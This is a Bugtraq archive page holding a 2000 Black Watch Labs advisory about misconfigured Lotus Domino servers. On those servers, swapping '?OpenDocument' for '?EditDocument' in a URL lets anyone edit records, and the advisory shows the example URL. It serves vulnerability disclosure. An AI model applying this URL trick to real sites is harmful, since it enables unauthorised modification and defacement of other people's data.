Bugtraq mailing list archives
Black Watch Labs Vulnerability Alert
From: blackwatchlabs () PERFECTOTECH COM (Black Watch Labs)
Date: Fri, 19 May 2000 18:55:02 -0700
Dear Security Professional,
The following vulnerability:
"Lotus Domino Server Misconfiguration Documents Can Be Modified
over the Web"
is in the text of the message below and has just been posted to the
Black Watch Labs Web site at
http://www.perfectotech.com/blackwatchlabs/
Thank you,
Black Watch Labs
If you wish to unsubscribe to this Black Watch Labs email update, please
click on reply and type the word "Unsubscribe" in the subject line.
----------------------------------------------------------------------------------------------
Name: Lotus Domino Server Misconfiguration Documents Can Be Modified
over the Web.
Black Watch Labs ID:
BWL-00-07
Date Released:
May 19th, 2000
Category:
Application(HTML)
Products affected:
Lotus Domino Server
Summary:
Documents(records) available for viewing in Lotus Domino server may be
edited over the web, if the access rights are not properly configured
for them.
Analysis:
The access rights for documents available through Lotus Domino server
allow users to edit them, although the URL contains only the open
(i.e. view) operation. This can be done easily via modifying the URL, so
that instead of OpenDocument, the browser will send EditDocument.
Exploits:
As hinted above. A typical URL would look like:
http://www.site-running-domino.server/database.nsf/whatever-this/whatever-that?OpenDocument
In such case, the exploit would be to send
http://www.site-running-domino.server/database.nsf/whatever-this/whatever-that?EditDocument
instead. Sites that have their access control in place would pop-up an
authentication window. Sites that are vulnerable will simply display the
document in Edit view, allowing the attacker to modify the document
data.
Number of affected sites/pages/users:
We examined sites that run Lotus Domino server, and found several ones
that allow editing. We estimate that more than 10% of the sites possess
such vulnerability. Among these:
? A well known USA university, offering a large database of
professionals and experts. Each record contains a contact info, field of
expertise, education, etc. for an individual. Each such record can be
edited and modified.
? A site devoted for one of the largest cities in the US; the site
contains an editors choice section for restaurants, which can be
edited and modified.
? A US government organizations site that contains a large database
the database can be modified.
? A US National Institute site whose content is loaded as database
queries. Parts of the site can be defaced.
Vendor Patch or workaround:
Each site running a Domino server is encouraged to ensure that its
databases are well-configured, so that the outside user is not allowed
to change records.
Response received from Lotus:
This is not a Defect. The arguments passed in the URL are not a security
feature. In this instance the ACL of the database must be configured
properly to determine if a document can be edited or not. Failure to do
this is considered poor design technique. Commands to edit a document
are passed via URL whether through a button or manually typed in. It is
up to the designer to properly configure a security scheme to determine
how the command will be acted on.
References and Links:
Lotus Domino server: http://www.lotus.com/home.nsf/welcome/domino
Note about our process of contacting the vendor:
We always contact the vendor and give them a few weeks to respond. Some
of them choose to fix it (see DBMan advisory for example), and some of
them don't. However, when the advisory gets published frequently the
vendor will fix it. So, overall the advisories not only educate security
professionals on the problem, they also encourage vendors to fix the
holes.
About Black Watch Labs (www.perfectotech.com/blackwatchlabs/)
Black Watch Labs are a research group operated by Perfecto Technologies
Inc., leader in application security products. Black Watch Labs were
established in order to further the knowledge of the e-commerce
community in the arena of web application security management. Black
Watch Labs publish security advisories regularly, which are maintained
at http://www.perfectotech.com/blackwatchlabs/, and are also posted to
relevant security lists and websites. Black Watch Labs also operate a
web application security mailing list, which can be subscribed to here
(http://www.perfectotech.com/blackwatchlabs/). For more info about
Black Watch Labs and Web Application Security, please call (650)
625-8101 or mail to BlackWatchLabs () phaser perfectotech com
About Perfecto Technologies (www.perfectotech.com)
Founded in 1997 and headquartered in Mountain View, Calif., Perfecto
Technologies pioneered the market for Web Application Security
Management software. AppShield, Perfectos initial product offering, is
the first to provide extreme security for customer-facing applications
in dynamic eBusiness environments. Privately held, Perfecto is funded
by blue-chip venture capital firms and industry leaders, including
Sequoia Capital, Walden, and Intel Corporation. More information about
Perfecto Technologies may be obtained by visiting the Companys Website
at www.perfectotech.com or by calling the Company directly at (650)
625-8101.
Copyright © 1997-2000 Perfecto Technologies LTD. All rights reserved.
Permission is hereby granted to reproduce and distribute the application
security alerts herein in their entiretly, provided the information,
this notice and all other Perfecto Technologies marks remain intact.
Specific Limitations on Use of the Perfecto Technologies Website
THIS SITE INCLUDES INFORMATION WHICH WILL ILLUSTRATE CERTAIN SECURITY
RISKS AND ISSUES ASSOCIATED WITH SITES ON THE INTERNET, INCLUDING,
POTENTIALLY, YOUR SITE. YOU AGREE THAT YOUR VIEWING OF THIS SITE IS
SOLELY FOR THE PURPOSES OF UNDERSTANDING THESE RISKS AND ISSUES WITH
RESPECT TO YOUR SITE AND THE PRODUCTS AND SERVICES OFFERED BY PERFECTO
TECHNOLOGIES. YOU AGREE NOT TO USE ANY INFORMATION DISCLOSED TO YOU FOR
ANY IMPROPER OR ILLEGAL PURPOSE, INCLUDING TO VIOLATE THE SECURITY OF
ANY OTHER PERSON'S SITE. YOU ARE EXPLICITLY WARNED THAT THE USE FOR ANY
IMPROPER PURPOSE OF INFORMATION DISCLOSED TO YOU COULD SUBJECT YOU TO
CIVIL AND CRIMINAL LIABILITY IN THE UNITED STATES AND OTHER COUNTRIES.
NO WARRANTY
Any material furnished by Perfecto Technologies is furnished on an as
is basis and may change without notice. Perfecto Technologies makes no
warranties of any kind, either expressed or implied as to any matter
including but not limited to, warranty of fitness for a particular
purpose or merchantability, exclusivity or results obtained from use of
the material. Neither does Perfecto Technologies make any warranty of
any kind with respect to freedom from patent, trademark or copyright
infringement. In no event shall Perfecto Technologies be liable for any
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.
Current thread:
- Re: Fwd: [nohack] Yet another way to disguise files. Dan Harkless (May 17)
- Re: Fwd: [nohack] Yet another way to disguise files. Larry Olin Horn (May 18)
- Nasty XFree Xserver DoS Chris Evans (May 18)
- MetaProducts Offline Explorer Directory Traversal Vulnerability Servio Medina (May 22)
- Vulnerability in infosrch.cgi SGI Security Coordinator (May 22)
- Re: Nasty XFree Xserver DoS Weston Pawlowski (May 22)
- <Possible follow-ups>
- Re: Fwd: [nohack] Yet another way to disguise files. Dan Harkless (May 18)
- [RHSA-2000:028-02] Netscape 4.73 available bugzilla () REDHAT COM (May 19)
- Black Watch Labs Vulnerability Alert Black Watch Labs (May 19)
- Black Watch Labs Vulnerability Alert Black Watch Labs (May 19)
- Re: Fwd: [nohack] Yet another way to disguise files. mock () ACTIVESTATE COM (May 19)